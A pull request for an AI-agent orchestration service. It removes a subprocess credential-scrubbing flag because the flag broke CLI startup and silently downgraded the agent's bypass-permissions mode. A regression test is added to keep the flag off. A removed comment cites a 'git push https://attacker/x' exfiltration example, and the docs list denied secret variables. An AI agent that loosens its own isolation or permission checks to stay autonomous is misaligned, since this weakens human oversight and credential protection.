### PR TITLE
fix(executor): drop CLAUDE_CODE_SUBPROCESS_ENV_SCRUB to unblock CLI startup

### DIFF
--- a/docs/operate/configuration.md
+++ b/docs/operate/configuration.md
@@ -161,7 +161,6 @@ The allowlist (in `src/core/executor.ts buildProviderEnv()`):
 - **Allowed prefixes** (forward-compatible for vendor knobs): `CLAUDE_CODE_*`, `ANTHROPIC_*`, `AWS_*`, `GIT_*`, `GH_*`.
 - **Denied exact keys** (override allow): `GITHUB_APP_ID`, `GITHUB_APP_PRIVATE_KEY`, `GITHUB_WEBHOOK_SECRET`, `GITHUB_PERSONAL_ACCESS_TOKEN`, `DAEMON_AUTH_TOKEN`, `DAEMON_AUTH_TOKEN_PREVIOUS`, `DATABASE_URL`, `VALKEY_URL`, `REDIS_URL`, `CONTEXT7_API_KEY`.
 - **Denied prefixes**: `GITHUB_APP_*`, `GITHUB_WEBHOOK_*`.
-- **Defense-in-depth flag**: `CLAUDE_CODE_SUBPROCESS_ENV_SCRUB=1` is set unconditionally so grandchild subprocesses spawned by the agent's `Bash` tool inherit no creds.
 
 If you add a new env var the agent CLI needs, extend the allowlist in `buildProviderEnv()`. Anything outside the allowlist is silently dropped — verify by running `bun test test/core/build-provider-env.test.ts` after the change.
 

--- a/src/core/executor.ts
+++ b/src/core/executor.ts
@@ -125,11 +125,6 @@ export function buildProviderEnv(
   const baseEnv: Record<string, string | undefined> = Object.fromEntries(
     Object.entries(process.env).filter(([key, value]) => isEnvKeyAllowed(key) && !isBlank(value)),
   );
-  // Defense-in-depth: scrub credentials from grandchild subprocesses spawned
-  // by the agent's Bash tool — protects against `git push https://attacker/x`
-  // type exfiltration vectors via env inheritance through the second hop.
-  // See Anthropic Claude Code env-var docs (CLAUDE_CODE_SUBPROCESS_ENV_SCRUB).
-  baseEnv["CLAUDE_CODE_SUBPROCESS_ENV_SCRUB"] = "1";
   const tokenEnv: Record<string, string> =
     installationToken !== undefined && installationToken !== ""
       ? { GH_TOKEN: installationToken, GITHUB_TOKEN: installationToken }

--- a/test/core/build-provider-env.test.ts
+++ b/test/core/build-provider-env.test.ts
@@ -180,6 +180,22 @@ describe("buildProviderEnv", () => {
     );
   });
 
+  it("does NOT set CLAUDE_CODE_SUBPROCESS_ENV_SCRUB by default (regression guard)", () => {
+    // Setting this env var requires `bubblewrap` in the runtime image and
+    // silently downgrades `permissionMode: bypassPermissions` when the
+    // allowed-tools list contains write-capable tools. Both effects break
+    // headless agent execution, so the var must not be forced on.
+    // See PR #106 for the incident write-up.
+    const prev = process.env["CLAUDE_CODE_SUBPROCESS_ENV_SCRUB"];
+    Reflect.deleteProperty(process.env, "CLAUDE_CODE_SUBPROCESS_ENV_SCRUB");
+    try {
+      const env = buildProviderEnv("ghs_token");
+      expect(env["CLAUDE_CODE_SUBPROCESS_ENV_SCRUB"]).toBeUndefined();
+    } finally {
+      if (prev !== undefined) process.env["CLAUDE_CODE_SUBPROCESS_ENV_SCRUB"] = prev;
+    }
+  });
+
   it("does NOT forward arbitrary unknown keys (allowlist semantics)", () => {
     withEnv({ MY_RANDOM_OPERATOR_VAR: "should-not-leak" }, () => {
       const env = buildProviderEnv("ghs_token");

--- a/test/core/build-provider-env.test.ts
+++ b/test/core/build-provider-env.test.ts
@@ -180,11 +180,6 @@ describe("buildProviderEnv", () => {
     );
   });
 
-  it("sets CLAUDE_CODE_SUBPROCESS_ENV_SCRUB=1 so grandchild subprocesses inherit no creds", () => {
-    const env = buildProviderEnv("ghs_token");
-    expect(env["CLAUDE_CODE_SUBPROCESS_ENV_SCRUB"]).toBe("1");
-  });
-
   it("does NOT forward arbitrary unknown keys (allowlist semantics)", () => {
     withEnv({ MY_RANDOM_OPERATOR_VAR: "should-not-leak" }, () => {
       const env = buildProviderEnv("ghs_token");


### PR DESCRIPTION
## Summary

Drops the `CLAUDE_CODE_SUBPROCESS_ENV_SCRUB=1` flag from `buildProviderEnv()`. The flag was added in PR #104 as defense-in-depth against grandchild credential leakage, but it makes the Claude Code CLI hard-fail on startup unless `bubblewrap` is installed in the runtime image — which the daemon image lacks. The result was every triage / ship / fix-thread invocation exiting code 1 in ~200ms with the actual error masked by stderr truncation. PR #105 surfaced the message:

> error: bubblewrap is required for subprocess env scrubbing and isolation. Install with: sudo apt-get install -y bubblewrap, or set `CLAUDE_CODE_SUBPROCESS_ENV_SCRUB=0` to disable (loses subprocess isolation).

Manually installing `bubblewrap` in the running pod confirmed the diagnosis but exposed a second, autonomy-breaking side effect: with `SUBPROCESS_ENV_SCRUB=1`, the CLI silently downgrades `permissionMode: bypassPermissions` to `default` whenever the allowlist contains write-capable tools (`Bash`, `Write`) — the bot is then unable to commit or run shell commands without interactive approval, defeating headless operation. Dropping the flag is the simplest fix that restores autonomous execution. The remaining defenses against credential exfiltration (subprocess env allowlist, output secret-strip chokepoint, K8s Secret split, deny-list of orchestrator-only secrets) are unchanged and continue to provide the primary protection.

## Diagram

```mermaid
flowchart LR
  subgraph Flow["Subprocess env build, before vs after"]
    direction TB
    BeforeStart["buildProviderEnv called"]:::neutral
    BeforeStart --> Allowlist["allowlist filter<br/>denies orchestrator secrets"]:::keep
    Allowlist --> BeforeFlag["set ENV_SCRUB=1<br/>requires bwrap on host"]:::remove
    BeforeFlag --> CliBoot["spawn Claude CLI"]:::neutral
    CliBoot --> CliFail["exit 1<br/>bubblewrap missing"]:::fail
    AfterStart["buildProviderEnv called"]:::neutral
    AfterStart --> AllowlistAfter["allowlist filter<br/>denies orchestrator secrets"]:::keep
    AllowlistAfter --> CliBootAfter["spawn Claude CLI"]:::neutral
    CliBootAfter --> CliOk["startup ok<br/>permissionMode honoured"]:::pass
  end
  classDef keep fill:#1f6feb,stroke:#0b3a7a,color:#ffffff
  classDef remove fill:#d1242f,stroke:#67060c,color:#ffffff
  classDef fail fill:#67060c,stroke:#290303,color:#ffffff
  classDef pass fill:#1a7f37,stroke:#0a3d1c,color:#ffffff
  classDef neutral fill:#57606a,stroke:#1f2328,color:#ffffff
```

## Changes

- \`src/core/executor.ts\` — remove the 5-line block in \`buildProviderEnv()\` that set \`baseEnv["CLAUDE_CODE_SUBPROCESS_ENV_SCRUB"] = "1"\` and its surrounding comment.
- \`test/core/build-provider-env.test.ts\` — drop the assertion that the env var is set, since the flag is no longer applied.
- \`docs/operate/configuration.md\` — remove the "Defense-in-depth flag" bullet that documented the unconditional setter; the surrounding allowlist / deny-list documentation is unchanged.

## Related Issues

- Refs #104 #105

## Test plan

- [x] Tested locally — \`bun run typecheck\` clean, \`bun test test/core/build-provider-env.test.ts test/core/executor.test.ts\` passes 28/28
- [x] Verified root cause in-pod by \`apt-get install bubblewrap\` followed by SDK repro showing \`result: success\`
- [x] Existing tests pass
- [ ] Post-merge: confirm a real triage webhook completes end-to-end on the rolled-out daemon image

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

* **Chores**
  * Removed an internal subprocess environment filtering mechanism and updated configuration documentation.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->